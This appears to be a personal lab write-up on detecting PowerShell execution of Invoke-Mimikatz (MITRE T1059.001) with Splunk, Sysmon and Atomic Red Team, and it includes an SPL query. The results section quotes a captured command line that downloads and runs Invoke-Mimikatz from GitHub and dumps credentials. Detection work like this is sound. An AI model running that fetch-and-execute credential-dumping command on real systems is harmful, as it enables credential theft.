tags: [detection, splunk, attack-range, mitre, T1059.001] date: {{date}} status: complete
π§ͺ Lab 1: PowerShell Execution β T1059.001
β Status
- Simulate:
powershell.exe -EncodedCommand ... - Write SPL to detect it (EventCode 4688 + CommandLine)
- Save alert and document in vault
π Description
π Introduction
Mimikatz is a well-known post-exploitation tool used by attackers to dump credentials from Windows memory.
Detecting its execution is critical for defending against credential theft and privilege escalation.
In this lab, I use Splunk Free, Sysmon, and Windows Security Logs to build a detection for suspicious PowerShell execution of Invoke-Mimikatz.
Mapped to MITRE ATT&CK technique T1059.001 β PowerShell under the Execution tactic.
π οΈ Detection Approach
- Environment: Windows 10 host + Splunk Free
- Logging: Sysmon & Security Event Logs
- Technique: MITRE ATT&CK T1059.001 β PowerShell
- Goal: Detect malicious PowerShell activity that downloads and executes
Invoke-Mimikatz
π Simulation Steps
Step 1 β Run Atomic T1059.001-1 Mimikatz
PS C:\AtomicREdTeam\atomics> Invoke-AtomicTest T1059.001 -TestNumbers 1
__
Step 2 β Detect Mimikatz in Splunk
π Splunk Query
eval CommandLine=lower(CommandLine)
search CommandLine="*powershell*"
search CommandLine="*iex*"
table _time, host, user, parent_process_name, process_name, CommandLine
__
Step 3β Write Detection/Connect to Discord Alerts
Splunk detected suspicious execution attempts:
-
Host:
KA-AR-WINDOWS -
User:
localuser -
Parent Process:
cmd.exe -
Process:
powershell.exe -
Command Line:
powershell.exe "iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/powershellmafia/powersploit/.../invoke-mimikatz.ps1'); invoke-mimikatz -dumpcreds"
__
Send alert to Discord Server using a script.
Webhook to Discord -
Mimikatz - actualshown -detection.png T1059.001.png
Takeaways-
Cool first detection attempt. Canβt wait to build more!